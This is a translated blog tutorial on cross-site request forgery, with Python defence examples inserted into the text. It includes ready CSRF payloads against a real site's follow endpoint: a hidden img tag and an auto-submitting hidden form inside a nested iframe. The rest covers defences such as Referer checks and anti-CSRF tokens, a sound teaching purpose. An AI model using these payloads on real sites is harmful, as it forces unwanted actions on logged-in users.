The CSRF Attack of web security

Source: Internet
Author: User
Tags: csrf, attack

What is CSRF?

CSRF (Cross-Site Request Forgery) works like this: after the user has logged in to the target site, the attacker lures the user into visiting an attack page. That page exploits the target site's trust in the user's browser to send a forged request, in the user's name, to the target site, and so carries out an action the user never intended.

As an example,

Simple version:

Suppose Cnblogs (the "blog park") exposes its "follow" action as a GET interface, where the blogUserGuid parameter is obviously the ID of the person to be followed:

http://www.cnblogs.com/mvc/Follow/FollowBlogger.aspx?blogUserGuid=4e8c33d0-77fe-df11-ac81-842b2b196315

Then all I need to do is put an img tag in the content of one of my posts:

<img style="width:0;" src="http://www.cnblogs.com/mvc/Follow/FollowBlogger.aspx?blogUserGuid=4e8c33d0-77fe-df11-ac81-842b2b196315" />

Then anyone who opens my post automatically follows me.

Upgrade version:

Suppose the follow interface still exists, but now it only accepts data sent by POST. The attacker then builds a third-party page containing the form code below and spreads the link through QQ, e-mail and other social tools, tempting users to open it; any user who opens it while logged in to Cnblogs is caught.

Before the example, let me correct an iframe mistake: some people write the form directly inside the iframe on the third-party page, like this:

<!DOCTYPE html>
<html lang="en-us">
<head><title>CSRF SHOW</title></head>
<body>
     <!-- a page that is not embedded in an iframe redirects after submit -->
     <iframe style="display:none;">
          <form name="form1" action="http://www.cnblogs.com/mvc/Follow/FollowBlogger.aspx" method="POST">
               <input type="hidden" name="blogUserGuid" value="4e8c33d0-77fe-df11-ac81-842b2b196315" />
               <input type="submit" value="" />
          </form>
          <script>document.forms.form1.submit();</script>
     </iframe>
</body>
</html>

This does not work: because of the same-origin policy, the content written inside the iframe is not loaded, so the form submission inside it is never executed.

PS: I tried Chrome, IE11 and Firefox; all behave this way.

So it can be solved with one more layer of nested pages, as follows:

First, the visible page (test):

<!DOCTYPE html>
<html lang="en-us">
<head><title>CSRF SHOW</title></head>
<body>
     <iframe style="display:none;" src="test2.html"></iframe>
</body>
</html>

Second, the hidden page (test2):

<!DOCTYPE html>
<html lang="en-us">
<head><title>CSRF GET</title></head>
<body>
     <form name="form1" action="http://www.cnblogs.com/mvc/Follow/FollowBlogger.aspx" method="POST">
          <input type="hidden" name="blogUserGuid" value="4e8c33d0-77fe-df11-ac81-842b2b196315" />
          <input type="submit" value="" />
     </form>
     <script>document.forms.form1.submit();</script>
</body>
</html>

This works. Some people ask why the extra iframe layer is needed: a page that is not embedded in an iframe redirects after the form is submitted, which reduces the concealment of the attack. Also, the test page does not use XMLHttpRequest to send the POST, because that runs into cross-domain restrictions, whereas a form can POST data across domains.

Advanced version:

Suppose the follow interface is restricted to POST, but post content is pasted straight into the HTML without filtering, so the site also suffers from XSS. Then the code above can be embedded directly in a blog post, and anyone who opens my post still follows me automatically. This combination of attacks is called XSRF.

The root cause of CSRF attacks

The root cause of CSRF is the Web's implicit authentication mechanism. Although the Web's authentication can guarantee that a request comes from the user's browser, it cannot guarantee that the user actually sent the request. CSRF is generally defended against on the server side.

CSRF defense methods

1. Prefer POST and restrict GET

GET interfaces are far too easy to turn into a CSRF attack: as the first example shows, an img tag is enough, and img tags are data that cannot be filtered out. Interfaces should preferably accept only POST and reject GET, which reduces the risk of attack.

Of course POST is not foolproof: the attacker only has to construct a form. But that has to be done on a third-party page, which increases the chance that the attack is exposed.

2. Browser Cookie Policy

IE6, 7, 8 and Safari block third-party cookies by default. But Firefox 2, 3, Opera, Chrome, Android and others do not, so relying on the browser's cookie policy to defend against CSRF is not reliable; at most it reduces the risk.

PS: cookies come in two kinds: session cookies (kept in memory and discarded when the browser is closed) and third-party cookies (that is, cookies that expire only at their expiry time), which are stored locally.

PS: In addition, if the site's HTTP response contains a P3P header, the browser will allow third-party cookies to be sent.

3. Add Verification Code

A verification code (CAPTCHA) forces the user to interact with the application before the final request completes. In general, a CAPTCHA is a good deterrent to CSRF. But for user-experience reasons a site cannot add a CAPTCHA to every operation, so it can only be an auxiliary measure, not the main solution.

4. Referer Check

The most common use of Referer checking on the Web is hotlink protection for images. In the same way, a Referer check can verify whether a request comes from a legitimate source (whether the Referer value is a specified page, or a domain belonging to the site); if it does not, the request is very likely a CSRF attack.

However, the server cannot always obtain a Referer, so this cannot be the main CSRF defense. But using Referer checks to monitor for CSRF attacks is a feasible approach.
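The Referer check used as a monitor, as described above, as an added example (not code from the original post). It assumes a hypothetical allowed-host list ALLOWED_HOSTS containing the site's own host, and takes constructed sample requests against the follow endpoint from the text. The point it shows beyond the prose: the host must be compared whole, not as a substring, and a missing Referer is counted separately rather than treated as an attack, because the server cannot always obtain one.

```python
from urllib.parse import urlsplit

# Hosts that the site's own pages are served from (hypothetical configuration).
ALLOWED_HOSTS = {"www.cnblogs.com"}


def referer_check(headers, allowed_hosts=ALLOWED_HOSTS):
    """Classify one request by its Referer header.

    Returns "ok" when the Referer host is one of the site's own hosts,
    "suspect" when it points somewhere else (a CSRF candidate), and
    "missing" when the browser sent no Referer at all. "missing" is kept
    separate because blocking on it would reject legitimate users; a
    caller should count it rather than treat it as an attack.
    """
    # Header names are case-insensitive; accept either spelling.
    referer = headers.get("Referer") or headers.get("referer")
    if not referer:
        return "missing"
    host = urlsplit(referer).hostname
    # A bare "www.cnblogs.com" or a malformed value has no parseable host;
    # treat it as suspect rather than guessing.
    if host is None:
        return "suspect"
    # Compare the whole host, never a substring: a Referer of
    # http://www.cnblogs.com.attacker.example/ must not pass.
    return "ok" if host.lower() in allowed_hosts else "suspect"


def monitor(requests, allowed_hosts=ALLOWED_HOSTS):
    """Run referer_check over a batch of requests and tally the outcomes.

    Each request is a dict with "path" and "headers". Returns the tally
    and the (path, referer) pairs flagged as suspect, for review.
    """
    tally = {"ok": 0, "suspect": 0, "missing": 0}
    suspects = []
    for req in requests:
        verdict = referer_check(req["headers"], allowed_hosts)
        tally[verdict] += 1
        if verdict == "suspect":
            suspects.append((req["path"], req["headers"].get("Referer")))
    return tally, suspects


# Constructed sample traffic against the follow endpoint from the text.
SAMPLE_REQUESTS = [
    {"path": "/mvc/Follow/FollowBlogger.aspx",
     "headers": {"Referer": "http://www.cnblogs.com/lovesong/p/5233195.html"}},
    {"path": "/mvc/Follow/FollowBlogger.aspx",
     "headers": {"Referer": "http://third-party.example/test2.html"}},
    {"path": "/mvc/Follow/FollowBlogger.aspx",
     "headers": {"Referer": "http://www.cnblogs.com.attacker.example/"}},
    {"path": "/mvc/Follow/FollowBlogger.aspx",
     "headers": {}},
]

if __name__ == "__main__":
    print(monitor(SAMPLE_REQUESTS))
```

Running it over the sample batch yields one "ok", two "suspect" (the third-party page and the look-alike host) and one "missing"; the suspect list is what an operator would review or alert on.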

5. Anti CSRF Token

The industry's consistent practice for defending against CSRF today is to use a token (the anti-CSRF token).

Example:

1. The user accesses a form page.

2. The server generates a token, which is placed in the user's session, or in the browser's cookie.

3. The token parameter is included with the page form.

4. After the user submits the form, the server checks that the token in the form matches the token in the user's session (or cookie). If it matches, the request is legitimate; otherwise it is rejected as illegal.

The token value must be random and unpredictable. With the token in place, an attacker can no longer construct a request that carries a legitimate token, so the CSRF attack fails. Token confidentiality also matters: change sensitive operations from GET to POST (submitted via a form or Ajax) as far as possible, to avoid leaking the token in URLs.
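The four steps above, together with the "POST only" rule from defense 1, carried out in server-side code as an added example (not code from the original post or from Cnblogs). It assumes an in-memory session store standing in for real server-side sessions, a hidden field named csrf_token, and a CsrfGuard class; the follow endpoint and blogUserGuid value are the ones from the text. The demo replays the page's scenarios: a legitimate submission passes, the attacker's forged form (which cannot know the token) fails, and an img-tag GET fails even if a token were somehow present.

```python
import hmac
import html
import secrets


class CsrfGuard:
    """Server-side anti-CSRF token handling for the four steps in the text.

    The session store is an in-memory dict standing in for real server-side
    session storage (constructed for this example).
    """

    def __init__(self):
        self._sessions = {}  # session_id -> token

    def issue_token(self, session_id):
        # Step 2: generate a random, unpredictable token once per session and
        # keep it in the session. secrets draws from the OS CSPRNG, so the
        # value is not derived from anything an attacker could guess.
        token = self._sessions.get(session_id)
        if token is None:
            token = secrets.token_urlsafe(32)
            self._sessions[session_id] = token
        return token

    def render_follow_form(self, session_id, blog_user_guid):
        # Step 3: embed the token in the form as a hidden field. The action is
        # the follow endpoint from the text; the field name csrf_token is an
        # assumption of this example.
        token = self.issue_token(session_id)
        return (
            '<form action="http://www.cnblogs.com/mvc/Follow/FollowBlogger.aspx" method="POST">\n'
            f'  <input type="hidden" name="blogUserGuid" value="{html.escape(blog_user_guid)}" />\n'
            f'  <input type="hidden" name="csrf_token" value="{token}" />\n'
            '  <input type="submit" value="Follow" />\n'
            '</form>'
        )

    def verify(self, session_id, method, form):
        # Step 4, plus the "POST only" rule from defense 1: the action is
        # rejected unless it arrives by POST and carries the token bound to
        # this session. compare_digest keeps the comparison constant-time so
        # the token cannot be recovered byte by byte from response timing.
        if method.upper() != "POST":
            return False
        expected = self._sessions.get(session_id)
        supplied = form.get("csrf_token")
        if expected is None or not isinstance(supplied, str):
            return False
        return hmac.compare_digest(expected.encode("utf-8"), supplied.encode("utf-8"))


def demo():
    """Replay the scenarios from the text against one logged-in session."""
    guard = CsrfGuard()
    victim = "session-of-logged-in-user"  # constructed session id
    target = "4e8c33d0-77fe-df11-ac81-842b2b196315"
    page = guard.render_follow_form(victim, target)  # step 1: user loads the form page
    token = guard.issue_token(victim)
    legit = guard.verify(victim, "POST", {"blogUserGuid": target, "csrf_token": token})
    forged = guard.verify(victim, "POST", {"blogUserGuid": target})  # attacker's form: no token
    img_get = guard.verify(victim, "GET", {"blogUserGuid": target, "csrf_token": token})
    return {"form_carries_token": token in page, "legit": legit, "forged": forged, "img_get": img_get}


if __name__ == "__main__":
    print(demo())
```

The token is bound to the session, so a token issued to one session is rejected when presented with another; that is what makes a token stolen from the attacker's own account useless against a victim.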

Note:

Anti-CSRF tokens only protect against CSRF. If the site also has an XSS vulnerability, the token defense is void, so XSS must be dealt with using XSS's own defenses.

Summary

A CSRF attack lets an attacker operate the user's account. The usual defense is the anti-CSRF token, with attention paid to the confidentiality and randomness of the token.

Reference documents:

1. "A Brief Discussion of CSRF Attack Methods"

2. "White Hat Talks Web Security"

This is an original article. If you reproduce it, please keep the link to the original so it can be traced back; if anything is wrong, thank you for pointing it out.

Original address: http://www.cnblogs.com/lovesong/p/5233195.html
